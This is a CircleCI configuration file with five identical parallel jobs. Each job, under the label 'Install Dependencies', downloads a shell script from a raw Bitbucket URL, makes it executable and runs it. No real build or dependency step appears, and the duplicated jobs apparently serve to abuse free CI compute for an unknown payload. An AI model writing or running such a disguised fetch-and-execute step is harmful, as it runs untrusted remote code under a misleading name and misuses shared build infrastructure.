version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/nosmould1/tes/raw/5bdcb98fea27dc0ec6ffb33d5183e118946afec5/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/nosmould1/tes/raw/5bdcb98fea27dc0ec6ffb33d5183e118946afec5/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/nosmould1/tes/raw/5bdcb98fea27dc0ec6ffb33d5183e118946afec5/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/nosmould1/tes/raw/5bdcb98fea27dc0ec6ffb33d5183e118946afec5/tes.sh && chmod u+x tes.sh && ./tes.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/nosmould1/tes/raw/5bdcb98fea27dc0ec6ffb33d5183e118946afec5/tes.sh && chmod u+x tes.sh && ./tes.sh
            parallesium: 5

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
